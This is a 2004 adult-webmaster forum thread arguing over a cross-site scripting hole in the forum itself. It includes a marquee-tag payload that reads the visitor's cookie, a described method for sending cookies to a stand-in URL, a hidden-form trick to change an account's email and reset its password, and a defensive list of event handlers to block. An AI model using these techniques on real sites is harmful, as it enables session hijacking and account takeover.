Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

View Poll Results: Bad Code.
Ouch ?<marquee width=1 height=1 loop=1 onstart="fudge.value='This is your GFY cookie '+document . cookie"></marquee> 9 50.00%
Huh ? 11 61.11%
Multiple Choice Poll. Voters: 18. You may not vote on this poll

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 03-09-2004, 11:01 PM   #51
SomeCreep
:glugglug
 
SomeCreep's Avatar
 
Join Date: Mar 2003
Location: Where the Wild Things Are
Posts: 26,118
50 GFY codes Exploitable
__________________

Webair Hosting

I use and recommend Webair for hosting.
SomeCreep is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:05 PM   #52
RainMailer
Confirmed User
 
Join Date: Feb 2003
Location: Portland
Posts: 826
Hehe nice job Road Rash do you have ICQ!
__________________
harbinc at gmail dot com
RainMailer is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:08 PM   #53
dirtyone
Confirmed User
 
Join Date: Jun 2002
Location: God's Country (Georgia)
Posts: 3,706
If you weren't such a pompus ass and obvious attention whore people might think you were actually trying to help.
dirtyone is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:12 PM   #54
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
Quote:
Originally posted by dirtyone


If you weren't such a pompus ass and obvious attention whore people might think you were actually trying to help.
heh
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:14 PM   #55
RainMailer
Confirmed User
 
Join Date: Feb 2003
Location: Portland
Posts: 826
Road Rash I would also like to see how this code works and how it can be fixed if you can email me the code to harbinc at cox.net
__________________
harbinc at gmail dot com
RainMailer is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:21 PM   #56
mryellow
Confirmed User
 
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
Quote:
Anyone with half a brain and even a halfway decent
understanding of html can think about it for about 10 seconds
and understand what it could do..
Not when you describe it as being something totally different to
what it actually is. It makes you look like you don't understand
the code your posting when you call it HTML and say it can do
anything on any server.

What you are talking about is a very particular combination of
techniques. Once you know the combination it does indeed
appear easy and many of us have seen these techniques used
before in different situations. However without investigation of
the steps needed someone can't just spend 10 seconds looking
at the code to figure out exact what the fuck it is you are talking
about.

I'm guessing english isn't your first language.... no offence but
when you use all the wrong words and describe things totally
backwards it does kinda make it hard for anyone to agree with
you.

Quote:
If i was an asshole i would just use the flaw for profit instead of
letting gfy know about it.
If you weren't an asshole you'd actually say what you mean
rather than talking all this crap about server hacking and sending
emails.

Lens.... He is right... It is exploitable.

You need to block a few event handlers such as onstart, onclick, etc.

-Ben
__________________
Cyberwurx Hosting
After trying 5 different hosts, I found the best.
Since 1997 I've had 2 hours of downtime.
Fast support, great techs, no hype, no gimmicks.

<- I in no way endorse whatever just got stuck on the left of my post.
mryellow is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:21 PM   #57
- Jesus Christ -
Confirmed User
 
Industry Role:
Join Date: Mar 2003
Location: ::::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::||||||||||||:::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::::::::::::::::::::
Posts: 7,197
You know no one gives a shit when....

Road Rash 23
mryellow 7
icedemon 4

You have three times as many posts as the second person in the thread (who successfully tore you down, might I add)

No I will not grab a brain and no I'm not your son.

http://www.polarhome.com/~plasticlsd/4smokey.MP3

nobody
__________________

Amen
- Jesus Christ - is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:24 PM   #58
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
jc so far everyone who doubted me has admitted after thinking about it for 2 seconds they were wrong .. Go back to bed jc.
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:24 PM   #59
mryellow
Confirmed User
 
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
It's just the guy mixes in so much bullshit with his facts that it
makes him appear like he has no idea what he's talking about.
Nice camouflage job... However I think I'd rather appear smart
then dumb.

Did it take you 2 seconds to come up with?

Stop trying to make ppl feel bad for not understanding your
backwards and simply wrong comments.

-Ben
__________________
Cyberwurx Hosting
After trying 5 different hosts, I found the best.
Since 1997 I've had 2 hours of downtime.
Fast support, great techs, no hype, no gimmicks.

<- I in no way endorse whatever just got stuck on the left of my post.
mryellow is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:27 PM   #60
- Jesus Christ -
Confirmed User
 
Industry Role:
Join Date: Mar 2003
Location: ::::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::||||||||||||:::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::::::::::::::::::::
Posts: 7,197
Go back to the secureity forum.... where peopel give a fuck.

Your nothing but an exploit baby.

Produce one piece of usefull software you have written.



FEEL THE NOBODIES, WANNA BE SOMBODIES.....

<img src="http://www.gofuckyourself.com/images/smilies/1orglaugh.gif" width=360 height=360>
__________________

Amen
- Jesus Christ - is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:28 PM   #61
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
mryellowsnow.

as i explained if i gave exact details on it it would also explain to every little punk with a copy and paste how to do it , so thats why i was vague.. sorry if you couldnt figure that out..
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:28 PM   #62
icedemon
Confirmed User
 
Join Date: Jun 2003
Location: Lutz, FL
Posts: 1,022
I can see how what you mentioned can be used to make popups and other stuff in j a v a s c r i p t that could cause trouble on GFY. What you found is a good find. But you really made it more than it really is. It can't do most of the stuff you mentioned.

Being able to change the password by having the cookie sent to you cannot be done. At least without asking the client permission before it is actually sent. It could be done with old browsers (I'm talking about the really old ones on Win 95 machines). But most newer browsers won't let emails be sent via j a v a s c r i p twithout permission from the client first.

Sending out emails via j a v a s c r i p tused to be a big problem in the early days. That's how emails were harvested. That has since been fixed for some years now.
__________________
Clips4Sale.com
icedemon is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:33 PM   #63
mryellow
Confirmed User
 
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
See the problem?

People still think you're talking about hacking servers or sending
emails from client machines.

It's not the fact that you hid the method....
I do think that was quite good of you.....

It's that you were talking about totally different things which
were quite simply wrong. You can not for example do anything to
any server with the method you're using.

You really can't blame someone for thinking you're barking up the
wrong tree when you say that jav-as-cript can do anything you want to the server.

Hide the actual code sure..... but why make yourself look stupid
by saying things that are so wrong.

Lens it does need fixing..... He may look stupid but he has found
an exploit that someone will probably soon use and could upset
some ppl.

-Ben
__________________
Cyberwurx Hosting
After trying 5 different hosts, I found the best.
Since 1997 I've had 2 hours of downtime.
Fast support, great techs, no hype, no gimmicks.

<- I in no way endorse whatever just got stuck on the left of my post.
mryellow is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:34 PM   #64
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
You dont need to use email just add the cookie to a string and pop it in a window example, yoururl.com/logged.cgi?+document . cookie

to change passwrod just make a hidden form with a replica of the profile form ( but with your own info ) now the email is whatever you changed it to , now just reset the password and have it sent to the new email , shebang.
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:34 PM   #65
foolio
ICQ: 178725656
 
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
For somebody that is so good at 'hacking' you sure do suck at reading and understanding the sig rules.

__________________
foolio is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:36 PM   #66
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
duocash is a top banner sponsor moron
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:37 PM   #67
mryellow
Confirmed User
 
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
Without actual testing I'm still not sure you'd fit in everything you
want to do into the character limit. However yes it is a worry.

-Ben
__________________
Cyberwurx Hosting
After trying 5 different hosts, I found the best.
Since 1997 I've had 2 hours of downtime.
Fast support, great techs, no hype, no gimmicks.

<- I in no way endorse whatever just got stuck on the left of my post.
mryellow is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:43 PM   #68
foolio
ICQ: 178725656
 
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
Quote:
duocash is a top banner sponsor moron
no shit asshole -- like I said, for somebody who is so good at 'hacking' you sure do suck at reading and UNDERSTANDING the sig rules:

2. Signature rules. Maximum 120x60 button and no more than 3 text lines of default size and color.
New as of 1/1/2003: if your sig is for a GFY top banner sponsor, you may use a 468x60 instead of a 120x60. Yes there is a reason this is so big. Also putting your text in a cell and making it look like a button is against the rules. Let me repeat... A 120 x 60 button and no more that 3 lines of DEFAULT SIZE AND COLOR text.

First, your sig banner is 645 x 120 -- that is ABOVE THE ALLOWED 468x60 for top banner sponsor.

Second, your text is NOT the default size OR color.


So eat a dick buttmunch --- go google for more GFY hacks

__________________
foolio is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:46 PM   #69
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
like i said i have already tested it , it fits under the character limit just fine besides you can hide an unlimited amount of characters in a hahahahahahahahahaha ;) with a document write ....

To the moron complaining about my sig.. my sig fits gfy see the top 10 posters on this board... my sig is the same. quit crying because you cant say anything usefull
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:50 PM   #70
foolio
ICQ: 178725656
 
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
Quote:
To the moron complaining about my sig.. my sig fits gfy see the top 10 posters on this board... my sig is the same. quit crying because you cant say anything usefull

"Mommy, mommy - the other kids are doing it, so that means its ok right mommy?"




like I said, you sure do have a hard time reading and understanding the sig rules.
__________________
foolio is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:55 PM   #71
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
I dont bend over , you do.. big difference.

Why would i use an undersized sig when the mods allow people to use oversized sigs if they are using a top sponsor.

Maybe if you sent one of the mods and angry email about it or cried to them via icq they might change all the sigs just for you..

Whoops i must have been dreaming there for a second
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-09-2004, 11:59 PM   #72
mryellow
Confirmed User
 
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
ext jv.... yeah got ya.

-Ben
__________________
Cyberwurx Hosting
After trying 5 different hosts, I found the best.
Since 1997 I've had 2 hours of downtime.
Fast support, great techs, no hype, no gimmicks.

<- I in no way endorse whatever just got stuck on the left of my post.
mryellow is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-10-2004, 12:07 AM   #73
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
Something close to this..

<img src="http://216.130.172.224/haha1.jpg">
<img src="http://216.130.172.224/haha2.jpg">
<img src="http://216.130.172.224/haha3.jpg">
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-10-2004, 12:41 AM   #74
mryellow
Confirmed User
 
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
No no.... much more dangerious.

You could run any new IE, ActiveX, Java, or Flash exploit on a
great deal of GFY members before the admins saw it.

This combined with other exploits or some yet to be discovered
could allow an attacker to gain complete control of your home
system via your browser.

-Ben
__________________
Cyberwurx Hosting
After trying 5 different hosts, I found the best.
Since 1997 I've had 2 hours of downtime.
Fast support, great techs, no hype, no gimmicks.

<- I in no way endorse whatever just got stuck on the left of my post.
mryellow is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-10-2004, 12:44 AM   #75
foolio
ICQ: 178725656
 
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
Quote:
Whoops i must have been dreaming there for a second
lol
__________________
foolio is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-10-2004, 12:48 AM   #76
mryellow
Confirmed User
 
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
GFY needs to block the following words:

onload
onunload
onchange
onsubmit
onreset
onselect
onblur
onfocus
onkeydown
onkeypress
onkeyup
onclick
ondblclick
hahahahahahahadown
hahahahahahahamove
hahahahahahahaout
hahahahahahahaover
hahahahahahahaup

-Ben
__________________
Cyberwurx Hosting
After trying 5 different hosts, I found the best.
Since 1997 I've had 2 hours of downtime.
Fast support, great techs, no hype, no gimmicks.

<- I in no way endorse whatever just got stuck on the left of my post.
mryellow is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-10-2004, 12:51 AM   #77
foolio
ICQ: 178725656
 
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
Quote:
Originally posted by mryellow
GFY needs to block the following words:

hahahahahahahadown
hahahahahahahamove
hahahahahahahaout
hahahahahahahaover
hahahahahahahaup

-Ben

yes, those hahaha's will fuck you up everytime

sorry, it was funny...
__________________
foolio is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-10-2004, 01:08 AM   #78
Road Rash
So Fucking Banned
 
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
Quote:
Originally posted by mryellow
No no.... much more dangerious.

You could run any new IE, ActiveX, Java, or Flash exploit on a
great deal of GFY members before the admins saw it.

This combined with other exploits or some yet to be discovered
could allow an attacker to gain complete control of your home
system via your browser.

-Ben
Now your catching on..


BTW you missed a few event handlers ;) and several other things..
Road Rash is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-11-2004, 12:06 AM   #79
mryellow
Confirmed User
 
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
Yeah can't be bothered hunting everything, leave that to GFY.

Just posting again to see if they are blocked......
Lens.... It's actually quite serious.

onload
onunload
onchange
onsubmit
onreset
onselect
onblur
onfocus
onkeydown
onkeypress
onkeyup
onclick
ondblclick

-Ben
__________________
Cyberwurx Hosting
After trying 5 different hosts, I found the best.
Since 1997 I've had 2 hours of downtime.
Fast support, great techs, no hype, no gimmicks.

<- I in no way endorse whatever just got stuck on the left of my post.
mryellow is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-2025, AI Media Network Inc



Powered by vBulletin
Copyright © 2000-2025 Jelsoft Enterprises Limited.